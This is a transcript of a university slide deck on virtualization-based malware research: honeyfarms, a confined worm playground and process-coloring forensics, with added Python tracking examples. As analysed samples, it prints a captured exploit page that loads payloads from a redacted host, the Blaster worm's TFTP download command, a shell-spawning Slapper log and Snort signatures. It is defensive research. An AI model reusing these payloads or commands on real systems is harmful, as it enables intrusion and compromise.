Enabling Internet Malware Investigation and Defense Using Virtualization

Dongyan Xu, Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University

Slides: 49

Transcript and Presenter's Notes

1
Enabling Internet Malware Investigation and Defense Using Virtualization
Dongyan Xu
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University

2
Collaborators
  • Florian Buchholz (James Madison U.)
  • Xuxian Jiang (George Mason U.)
  • Junghwan Rhee (Purdue U.)
  • Ryan Riley (Purdue U.)
  • Eugene H. Spafford (Purdue U.)
  • AAron Walters (Fortify Research)
  • Helen Wang (Microsoft Research)
  • Yi-Min Wang (Microsoft Research)

3
Motivation: Rampant Malware Outbreaks
  • Internet malware remains a top threat
  • Malware: Virus, Worm, Spyware, Keylogger, Bot, ...

[Chart: outbreak timeline labelled Blaster, CodeRed, Nimda. Source: Symantec Internet Security Threat Report]
4
Motivation: Stealthy Malware
  • Recruiting vulnerable nodes (e.g. to create a botnet)
    • Zero-day exploits w/o software patches
    • Low-and-slow propagation
    • New attack strategies
      • Exploiting vulnerable client-side software, such as IE
      • Propagating malware with RFID tags
  • Providing "value-added service" (or rather, harm)
    • DDoS, spamming, identity theft, ...
    • Sell/rent botnets for profit

5
Reality: Challenges
  • Lack of an investigation platform that enables
    • Early detection and capture of malware incidents
    • Replay and observation of malware behavior
  • At Internet scale this is hard to build
  • Increased spreading speed, sophistication, and malice
    • Slammer: worms infect 75,000 hosts in 10 minutes (Moore et al, 2003)
    • Stealthy malware, zero-day exploits, mutations, ...

6
Our Integrated Malware Research Framework
[Diagram: Detection, Investigation and Defense layered on Virtualization. External Infection is handled by the Front-End Collapsar Honeyfarm and the Back-End vGround Playground; Internal Contamination by Process Coloring. Citations: Collapsar (Security04, NDSS06, JPDC06), vGround (RAID05), WORM06, Proc. Coloring (ICDCS06)]

7
Part I: Malware Capture
[Framework diagram repeated, with Front-End Collapsar (Security04, NDSS06, JPDC06) and Back-End vGround (RAID05, WORM06) highlighted; Coloring (ICDCS06)]
8
Existing Approach: Honeypot
[Diagram: honeypots deployed separately in Domain A, Domain B and Domain C, each facing the Internet]
  • Two weaknesses
    • Manageability vs. detection coverage
    • Security risks → on-site attack occurrences

9
Our Approach: Collapsar
[Diagram: Redirectors in Domain A, Domain B and Domain C forward traffic to the Collapsar Center, which consists of a Front-End, VM-based Honeypots, a Management Station and a Correlation Engine (the Collapsar Honeyfarm)]
  • Benefit 1: Centralized management of honeypots w/ distributed (virtual) presence
  • Benefit 2: Off-site attack occurrences
  • Benefit 3: New possibilities for real-time attack correlation and log mining
10
Collapsar as a Server-side Honeyfarm
  • Passive honeypots w/ vulnerable server-side software
    • Web servers (e.g., Apache, IIS, ...)
    • Database servers (e.g., Oracle, MySQL, ...)

[Figure labels: Blaster (2003), Sasser (2004), Zotob (2005)]

11
Collapsar as a Client-side Honeyfarm
  • Active honeypots w/ vulnerable client-side software
    • Web browsers (e.g., IE, Firefox, ...)
    • Email clients (e.g., Outlook, ...)

[Figure labels: PlanetLab (310 sites); HoneyMonkey (NDSS06): 288 malicious sites / 2 zero-day exploits]
12
A Real Incident: Exploitation of Client-side Vulnerability
  • Upon clicking a malicious URL
    • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
  • Result (page source as captured on the slide, hosts redacted):

    <html><head><title></title></head><body> <style>
    CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr") </style> <APPLET ARCHIVE'count.jar'
    CODE'BlackBox.class' WIDTH1 HEIGHT1> <PARAM
    NAME'url' VALUE'http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try document.write('<object data10911545105116115
    58 109104116109108581021051081
    0158 //C\fo''o.mht!''http://vxxxx''xxe.biz/
    /adv''erts//033//targ.ch' 'm/targ''et.htm
    typetext/x-scriptlet></ob''ject>') catch(e)
    </script> </body></html>

  • Vulnerabilities exploited: MS05-002, MS03-011, MS04-013
  • 22 unwanted programs are installed without the user's consent!
13
Related Work
[Comparison table. Systems compared: Honeyd (Security04), iSink (RAID04), IMS (NDSS05), honeyclient (RECON05), Domino (NDSS04), NetBait (03), Potemkin (SOSP05), GQ (06), Collapsar (Security04, JPDC06)]
Comparison criteria:
  • High-interaction w/ real services
  • Off-site attack occurrences
  • Aggregation of scattered unused address space
  • Passive / active honeypots (recovered cell values, in column order: "Passive Active", "Passive Active", "Passive", "Passive", "Passive", "Active"; the remaining cells were not captured)
14
Part II: Malware Playground
[Framework diagram repeated, with Back-End vGround (RAID05) highlighted; Front-End Collapsar (Security04, NDSS06, JPDC06); Coloring (ICDCS06)]

15
Challenges
  • Fidelity → real worms
  • Confinement → destructive worms
  • Scalability → epidemic propagation pattern
  • Experimental efficiency

16
A Virtualization-Based Worm Playground
  • High fidelity
    • VM: full-system virtualization
  • Strict confinement
    • VN: link-layer network virtualization
  • Easy deployment
    • Locally deployable
  • Efficient experiments
    • Image generation time: 60 seconds
    • Boot-strap time: 90 seconds
    • Tear-down time: 10 seconds

[Diagram: a worm playground built on Virtualization, hosted on paris.cs.purdue.edu]
Quoted from "Fighting Computer Virus Attacks", Peter Szor, USENIX Security Symp., 2004
17
Challenge in Achieving Scalability
  • Three main techniques
    • VM footprint minimization
      • Redhat 9.0: 1G → 32M
    • Delta virtualization (a.k.a. copy-on-write)
    • Worm-driven vGround runtime expansion
  • 2000 virtual nodes in 10 physical machines

18
Worm Experts' Comments on vGround
19
vGround Impact: Applications
  • Evaluation
    • Correctness of documented worm/malware analysis
    • Effectiveness of defense mechanisms
  • Education potential

20
Part III: Malware Defense
[Framework diagram repeated, with Internal Contamination / Coloring (ICDCS06) highlighted; Front-End Collapsar (Security04, NDSS06, JPDC06); Back-End vGround (RAID05)]

21
Malware Forensics
  • For each malware incident, it is desirable to find out
    • Break-in point: How did the malware break into the system?
    • Contaminations: What did the malware do after the break-in?

22
Current Approach
  • Question 1: How did the malware break into the system?
  • Question 2: What did the malware do after the break-in?

[Diagram: httpd spawns /bin/sh; /bin/sh spawns netcat, which reads /etc/shadow (confidential info), modifies local files, and spawns wget, which fetches a root kit; an Alert is raised on the root kit]
23
Current Approach
  • 1: Online log collection

Log:
  httpd READS an incoming request
  httpd CREATES a new process /bin/sh
  /bin/sh CREATES a new process netcat
  netcat READS /etc/shadow file
  /bin/sh MODIFIES local files
  /bin/sh CREATES a new process wget
  wget CREATES local file(s) - Root kit

[Diagram as on slide 22: httpd, /bin/sh, netcat, /etc/shadow (confidential info), local files, wget, root kit, Alert]
24
Current Approach
  • 1: Online log collection
  • 2: Offline backward tracking (King, SOSP03)

Backward tracking from the Alert (root kit) through the log:
  wget CREATES local file(s) - Root kit
  /bin/sh CREATES a new process wget
  httpd CREATES a new process /bin/sh
  → Break-in point!

[Diagram: Alert ← Root kit ← wget ← /bin/sh ← httpd]
25
Current Approach
  • 1: Online log collection
  • 2: Offline backward tracking
  • 3: Offline forward tracking

Forward tracking from the break-in point through the log:
  httpd CREATES a new process /bin/sh
  /bin/sh CREATES a new process netcat
  netcat READS /etc/shadow file
  /bin/sh MODIFIES local files
  /bin/sh CREATES a new process wget
  wget CREATES local file(s) - Root kit

[Diagram: Break-in point (httpd) → /bin/sh → netcat → /etc/shadow (confidential info); /bin/sh → local files; /bin/sh → wget → Root kit → Alert]
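The backward and forward tracking steps on the preceding slides, worked as an added example in Python. This is not code from the presentation or from King's BackTracker; the log is constructed in the slide's (time, subject, operation, object) form, with three unrelated daemon entries mixed in, and the set of "external input" objects is an assumption. Note that each step of backward tracking rescans the whole log, which is exactly the cost the next slide criticizes.

```python
"""Backward and forward dependency tracking over an OS-level event log.

Added illustration of the approach described on the slides; not code from the
presentation or from the authors' tools.
"""

# Constructed log in the (time, subject, operation, object) form used on the slides.
# Entries 2, 5 and 8 are unrelated daemon activity, added to show what tracking
# has to scan past.
LOG = [
    (1, "httpd", "READS", "incoming request"),
    (2, "sendmail", "READS", "/proc/loadavg"),
    (3, "httpd", "CREATES", "/bin/sh"),
    (4, "/bin/sh", "CREATES", "netcat"),
    (5, "named", "READS", "/etc/named.conf"),
    (6, "netcat", "READS", "/etc/shadow"),
    (7, "/bin/sh", "MODIFIES", "local files"),
    (8, "sshd", "MODIFIES", "/var/log/wtmp"),
    (9, "/bin/sh", "CREATES", "wget"),
    (10, "wget", "CREATES", "Root kit"),
]

INBOUND = {"READS"}                      # information flows object -> subject
OUTBOUND = {"CREATES", "MODIFIES"}       # information flows subject -> object
EXTERNAL_INPUTS = {"incoming request"}   # objects that arrive from outside the host (assumption)


def backward_track(log, detection_object, detection_time):
    """Return, in time order, the entries on which the detection point depends."""
    worklist = [(detection_object, detection_time)]
    visited = set()
    related = []
    while worklist:
        node, t = worklist.pop()
        if (node, t) in visited:
            continue
        visited.add((node, t))
        for entry in log:                  # every step rescans the whole log
            ts, subj, op, obj = entry
            if ts > t:
                continue                   # later events cannot have influenced node
            if op in OUTBOUND and obj == node:
                source = subj              # node was created/modified by subj
            elif op in INBOUND and subj == node:
                source = obj               # node read obj
            else:
                continue
            if entry not in related:
                related.append(entry)
            worklist.append((source, ts))
    return sorted(related)


def find_breakin(log, detection_object, detection_time):
    """The earliest related entry in which a process consumed external input."""
    for entry in backward_track(log, detection_object, detection_time):
        if entry[2] in INBOUND and entry[3] in EXTERNAL_INPUTS:
            return entry
    return None


def forward_track(log, breakin_subject, breakin_time):
    """Return every entry caused by the break-in: actions of contaminated
    processes plus reads of contaminated objects, in time order."""
    contaminated = {breakin_subject: breakin_time}   # node -> time it became contaminated
    related = []
    for entry in sorted(log):
        ts, subj, op, obj = entry
        if subj in contaminated and ts > contaminated[subj]:
            related.append(entry)                    # an action of a contaminated process
            if op in OUTBOUND:
                contaminated.setdefault(obj, ts)     # contamination spreads to the object
        elif op in INBOUND and obj in contaminated and ts > contaminated[obj]:
            related.append(entry)                    # a process consumed a contaminated object
            contaminated.setdefault(subj, ts)
    return related


if __name__ == "__main__":
    alert = ("Root kit", 10)            # detection point: the root kit file appears
    breakin = find_breakin(LOG, *alert)
    print("break-in point:", breakin)
    for e in forward_track(LOG, breakin[1], breakin[0]):
        print("contamination:", e)
```

Run stand-alone, the script reports entry 1 (httpd reading the incoming request) as the break-in point and the six entries from slide 25 as the contamination, while the sendmail, named and sshd entries are scanned but never reported.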
26
Weaknesses of Current Approach
Analyze the entire log!
  • Backward tracking → break-in point
    • Inputs: detection point and the entire log
  • Forward tracking → contaminations
    • Inputs: break-in point and the entire log

High-volume log data: 1.2 gigabytes per day under server workload
[Figure: log volume growing over time]
27
Our Approach - Process Coloring
  • Main idea: information flow-preserving logging

[Diagram: a log with one suspicious log entry highlighted]
28
Our Approach - Process Coloring
  • 1: Initial coloring
    [Diagram: init → rc → s30sendmail, s45named, s55sshd, s80httpd, each started service assigned its own color and each of its log entries carrying that color]
  • 2: Coloring diffusion
    [Diagram: httpd's color diffuses to /bin/sh, netcat (reads /etc/shadow, confidential info), local files, wget and the root kit that triggers the Alert]
  • Benefit 1: Immediate identification of break-in point
  • Benefit 2: Color-based log partition for contamination analysis
29
Color Diffusion Model
  • Color diffusion model
  • OS-level information flow (Buchholz 2005)

[Table: columns "syscalls", "Operation", "Diffusion"; cell contents not captured]
30
Process Coloring Log: Slapper Worm
  • ...
  • BLUE 673 "sendmail" 5_open("/proc/loadavg", 0, 438) 5
  • BLUE 673 "sendmail" 192_mmap2(0, 4096, 3, 34, 4294967295, 0) 1073868800
  • BLUE 673 "sendmail" 3_read(5, "0.26 0.10 0.03 2...", 4096) 25
  • BLUE 673 "sendmail" 6_close(5) 0
  • BLUE 673 "sendmail" 91_munmap(1073868800, 4096) 0
  • ...
  • RED 2568 "httpd" 102_accept(16, sockaddr2, cbbdff3a, cbbdff38) 5
  • RED 2568 "httpd" 3_read(5, "\1281\1\0\2\0\24...", 11) 11
  • RED 2568 "httpd" 3_read(5, "\7\0À\5\0\128\3\...", 40) 40
  • RED 2568 "httpd" 4_write(5, "\132_at_\4\0\1\0\2\...", 1090) 1090
  • RED 2568 "httpd" 4_write(5, "\128\19Ê\136\18\...", 21) 21
  • RED 2568 "httpd" 63_dup2(5, 2) 2
  • RED 2568 "httpd" 63_dup2(5, 1) 1
  • RED 2568 "httpd" 63_dup2(5, 0) 0
  • RED 2568 "httpd" 11_execve("/bin//sh", bffff4e8, 00000000)
  • RED 2568 "sh" 5_open("/etc/ld.so.prelo...", 0, 8) -2
  • RED 2568 "sh" 5_open("/etc/ld.so.cache", 0, 0) 6

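The initial coloring, color diffusion and color-based partition of slides 28 to 30, worked as an added Python example; it is not the authors' Process Coloring implementation. The uncolored system-call trace is constructed (pids 673 and 2568 are taken from the log above, the file names from the Slapper diagram on the backup slides); the diffusion rules used (fork inherits, execve keeps, write colors a file, read picks up a file's colors) are an assumption consistent with the slides, not the authors' full table. The example goes one step beyond the slide and also shows color mixing, the anomaly the "Counter-attacks" backup slide mentions.

```python
"""Process coloring over a system-call trace.

Added example (not the Process Coloring code from the presentation): initial
coloring of daemons, color diffusion through fork/open/read/write, and a
color-based partition of the resulting log.
"""
from collections import defaultdict

# Initial coloring, as assigned by rc when the daemons start (pids constructed).
INITIAL_COLORS = {673: {"BLUE"}, 2568: {"RED"}}   # sendmail -> BLUE, httpd -> RED

# Constructed uncolored trace: (seq, pid, comm, syscall, args, ret).
# For fork, ret is the child pid; for open, ret is the new fd.
TRACE = [
    (1, 673, "sendmail", "open", ("/proc/loadavg", 0, 438), 5),
    (2, 673, "sendmail", "read", (5, 4096), 25),
    (3, 673, "sendmail", "close", (5,), 0),
    (4, 2568, "httpd", "accept", (16,), 5),          # fd 5 is a client socket
    (5, 2568, "httpd", "read", (5, 40), 40),
    (6, 2568, "httpd", "dup2", (5, 0), 0),
    (7, 2568, "httpd", "execve", ("/bin//sh",), 0),
    (8, 2568, "sh", "fork", (), 2586),
    (9, 2586, "sh", "execve", ("/bin/rm", "-rf", "/tmp/.bugtraq.c"), 0),
    (10, 2568, "sh", "fork", (), 2587),
    (11, 2587, "cat", "open", ("/tmp/.uubugtraq", 577, 420), 3),
    (12, 2587, "cat", "write", (3, 20), 20),
    (13, 673, "sendmail", "open", ("/tmp/.uubugtraq", 0, 0), 7),
    (14, 673, "sendmail", "read", (7, 4096), 20),    # reads a RED-colored file
    (15, 673, "sendmail", "close", (7,), 0),
]

SHELLS = {"/bin/sh", "/bin//sh", "/bin/bash"}


def color_trace(trace, initial_colors):
    """Replay the trace and diffuse colors. Each returned entry is
    (colors, seq, pid, comm, syscall, args, ret), with the colors the
    process carried when the call was made."""
    colors = defaultdict(set)                  # pid or file path -> set of colors
    for pid, cs in initial_colors.items():
        colors[pid] = set(cs)
    fds = {}                                   # (pid, fd) -> path, for files opened with open()
    colored = []
    for seq, pid, comm, call, args, ret in trace:
        colored.append((frozenset(colors[pid]), seq, pid, comm, call, args, ret))
        if call == "fork":                     # child inherits the parent's colors
            colors[ret] = set(colors[pid])
        elif call == "open" and ret >= 0:
            fds[(pid, ret)] = args[0]
        elif call == "close":
            fds.pop((pid, args[0]), None)
        elif call == "write":                  # process colors flow into the file
            path = fds.get((pid, args[0]))
            if path is not None:
                colors[path] |= colors[pid]
        elif call == "read":                   # file colors flow into the process
            path = fds.get((pid, args[0]))     # sockets are not in fds: no diffusion
            if path is not None:
                colors[pid] |= colors[path]
        # execve keeps the process's colors unchanged
    return colored


def partition_by_color(colored):
    """Benefit 2: split the log so each color can be analysed on its own."""
    parts = defaultdict(list)
    for entry in colored:
        for c in sorted(entry[0]) or ["UNCOLORED"]:
            parts[c].append(entry)
    return dict(parts)


def shell_executions(colored, color):
    """Benefit 1: a process carrying a network daemon's color that execs a
    shell is the break-in point, found without scanning other colors."""
    return [e for e in colored if color in e[0] and e[4] == "execve" and e[5][0] in SHELLS]


def mixed_color_processes(colored):
    """Pids whose entries carry more than one color (color mixing)."""
    return sorted({e[2] for e in colored if len(e[0]) > 1})


def format_entry(e):
    """Render an entry in the style of the log on the slide."""
    colors, seq, pid, comm, call, args, ret = e
    label = "+".join(sorted(colors)) or "UNCOLORED"
    return f'{label} {pid} "{comm}" {call}({", ".join(repr(a) for a in args)}) = {ret}'


if __name__ == "__main__":
    log = color_trace(TRACE, INITIAL_COLORS)
    for entry in log:
        print(format_entry(entry))
    print("break-in candidates:", [format_entry(e) for e in shell_executions(log, "RED")])
    print("mixed-color pids:", mixed_color_processes(log))
```

The RED partition contains only httpd's lineage (ten entries), the BLUE one only sendmail's (six); the single RED execve of a shell is entry 7, and pid 673 shows up as mixed because it read a file written by a RED process, which is the anomaly a filtering policy would have to decide about.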
31
Evaluation
                             Lion                   Slapper                 SARS
Time period being analyzed   24 hours               24 hours                24 hours
Worm-related entries         66,504                 195,884                 19,494
Exploited service            BIND (CVE-2001-0010)   Apache (CAN-2002-0656)  Samba (CAN-2003-0085)
% of log inspected           48.7                   65.9                    12.1

  • Benefit for backward tracking: immediate identification of break-in point
  • Benefit for forward tracking: reduced log volume for contamination analysis
32
Challenge in Log Collection
  • System call interception

[Diagram: User Process 1 and User Process 2 make system calls; Logging sits inside the OS Kernel]
Question: Can we trust a compromised system to collect log information?

33
Virtual Machine Introspection (Garfinkel, NDSS03)
  • Interception on the system virtualization path
  • More tamper-resistant

[Diagram: User Process 1 and User Process 2 run on the Guest OS Kernel/UML inside a Virtual Machine; Logging is moved from the guest OS kernel to the virtualization layer]
34
On-going Work
  • Multi-dimensional worm profiling / identification
    • Content fingerprinting
      • Unique recurring content
    • Behavioral footprinting
      • Unique recurring behavior → infection cycle
      • Probing → Exploitation → Replication → Payload

35
MSBlaster/Windows Worm
[Diagram: Blaster host and Target/RPC host (addresses 192.168.0.1 and 192.168.10.11); infection steps shown as message exchanges]
  1. Exploits target on port 135/TCP
  2. Binds svchost.exe to port 4444/TCP via injected code
  3. Connects to target on port 4444/TCP
  4. Creates a shell cmd.exe and binds it to port 4444/TCP
  5. Creates TFTP server on port 69/UDP
  6. Sends TFTP command to shell
  7. Runs TFTP command, teleports msblast.exe file
     >tftp -i 192.168.0.1 GET msblast.exe
  8. Sends START msblast.exe command
  9. Runs worm on target!
  10. Closes connection
  11. Shell closes

Snort signature for step 1:
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"|77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B|";)
36
Worm Name / Infection Vector / Behavioral Footprints
  • MSBlaster / RPC-DCOM
    • Exploitation:
      alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"|77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B|";)
    • Replication: [not captured]

37
Worm Name / Infection Vector / Behavioral Footprints
[Table; behavioral footprint cells not captured]
  • MSBlaster / RPC-DCOM
  • Welchia / (cell not captured)
  • Sasser / LSASS
  • Ramen / LPRng, WU-FTPD, NFS-UTILS
  • Lion / BIND
  • Slapper / APACHE
  • SARS / SAMBA
38
Summary
[Diagram: Collapsar with Redirectors in Domain A, Domain B and Domain C feeding a Front-End; vGround I and vGround II behind it]
Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research platform

39
Thank you.
For more information: Email dxu@cs.purdue.edu, URL http://www.cs.purdue.edu/dxu
40
  • Backup Slides

41
Another Example Incident: Windows XP Server-side Honeypot/VMware
  • Vulnerability
    • RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
  • Time-line
    • Deployed: 22:10:00pm, 11/26/03
    • MSBlast: 00:36:47am, 11/27/03
    • Enbiei: 01:48:57am, 11/27/03
    • Nachi: 07:03:55am, 11/27/03

http://www.cs.purdue.edu/homes/jiangx/collapsar
42
vGround Network Virtualization
  • Option 1: Network-layer virtualization (e.g., X-Bone)
    [Diagram: Guest OS traffic carried IP-in-IP between Host OS / VMM instances]
  • Option 2: Link-layer virtualization (e.g., VIOLIN)
    [Diagram: Guest OSes attached to Virtual Switch 1 across Host OS / VMM instances]
43
Logging Integrity -- Existing Approach
  • System call interception

[Diagram: a process issues fork(/bin/sh); the System Call Dispatcher indexes the System Call Table and the result is returned to the caller]
System Call Table (excerpt):
  0    restart      sys_restart_syscall
  1    exit         sys_exit
  2    fork         sys_fork
  3    read         sys_read
  4    write        sys_write
  283  ni_syscall   sys_ni_syscall
Unreliable!
44
Virtual Machine Introspection (Garfinkel, NDSS03)
  • Interception at the system virtualization path

[Diagram: Guest OS 1 and Guest OS 2, each with Logging performed below the guest at the virtualization layer]
Tamper-resistant!
45
Process Coloring -- Slapper Worm
[Diagram of the colored process tree: inet_sock(80) → recv → 2568 httpd: accept (fd 5), dup2, read → execve 2568 /bin//sh → execve 2568 /bin/bash -i → fork, execve → 2586 /bin/rm -rf /tmp/.bugtraq.c and 2587 /bin/cat: open, dup2, write → /tmp/.uubugtraq; unlink → /tmp/.bugtraq.c]

46
Process Coloring Log: Slapper Worm
47
Counter-attacks against Proc. Coloring
  • Coloring mixing attack
    • Good news: an important anomaly itself
    • Bad news: need for advanced filtering policies
  • Low-level attack
    • Kernel integrity (e.g. CoPilot, Livewire, Pioneer)
    • Shadow structure via VMM
  • Diffusion-cutting attack
    • Covert channels

48
Footprinting Representation
MSBlaster Worm
[Diagram of the behavioral footprint as a message sequence:]
  • 1st TCP handshake, 135/TCP
    alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"|77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B|";)
    RST
  • 2nd TCP handshake, 4444/TCP (shell)
  • Sending tftp, 69/UDP (tftp)
    RST